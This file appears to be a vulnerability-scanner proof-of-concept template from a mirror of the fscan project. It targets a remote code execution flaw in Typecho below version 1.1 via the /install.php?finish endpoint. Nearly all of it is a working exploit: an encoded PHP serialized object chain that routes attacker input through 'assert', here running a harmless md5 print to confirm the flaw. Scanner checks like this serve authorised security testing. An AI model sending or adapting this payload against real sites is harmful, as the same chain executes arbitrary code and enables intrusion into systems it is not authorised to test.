mirror of https://github.com/qwqdanchun/fscan.git
21 lines
1.5 KiB
YAML
21 lines
1.5 KiB
YAML
name: poc-yaml-typecho-rce
|
|
set:
|
|
referer: request.url
|
|
random_str: randomLowercase(4)
|
|
payload: base64(urldecode("a%3A2%3A%7Bs%3A7%3A%22adapter%22%3BO%3A12%3A%22Typecho_Feed%22%3A2%3A%7Bs%3A19%3A%22%00Typecho_Feed%00_type%22%3Bs%3A8%3A%22ATOM+1.0%22%3Bs%3A20%3A%22%00Typecho_Feed%00_items%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A8%3A%22category%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A15%3A%22Typecho_Request%22%3A2%3A%7Bs%3A24%3A%22%00Typecho_Request%00_params%22%3Ba%3A1%3A%7Bs%3A10%3A%22screenName%22%3Bs%3A18%3A%22print%28md5%28%27" + random_str + "%27%29%29%22%3B%7Ds%3A24%3A%22%00Typecho_Request%00_filter%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7D%7D%7Ds%3A6%3A%22author%22%3BO%3A15%3A%22Typecho_Request%22%3A2%3A%7Bs%3A24%3A%22%00Typecho_Request%00_params%22%3Ba%3A1%3A%7Bs%3A10%3A%22screenName%22%3Bs%3A18%3A%22print%28md5%28%27" + random_str + "%27%29%29%22%3B%7Ds%3A24%3A%22%00Typecho_Request%00_filter%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7D%7D%7D%7D%7Ds%3A6%3A%22prefix%22%3Bs%3A8%3A%22typecho_%22%3B%7D"))
|
|
rules:
|
|
- method: POST
|
|
path: /install.php?finish
|
|
headers:
|
|
Referer: '{{referer}}'
|
|
body: >-
|
|
__typecho_config={{payload}}
|
|
follow_redirects: false
|
|
expression: >
|
|
response.status == 200 && response.body.bcontains(bytes(md5(random_str)))
|
|
detail:
|
|
author: last0monster(https://github.com/last0monster)
|
|
effect_version: typecho < 1.1(17.10.24)
|
|
links:
|
|
- https://www.freebuf.com/vuls/155753.html
|
|
- https://www.freebuf.com/vuls/152058.html |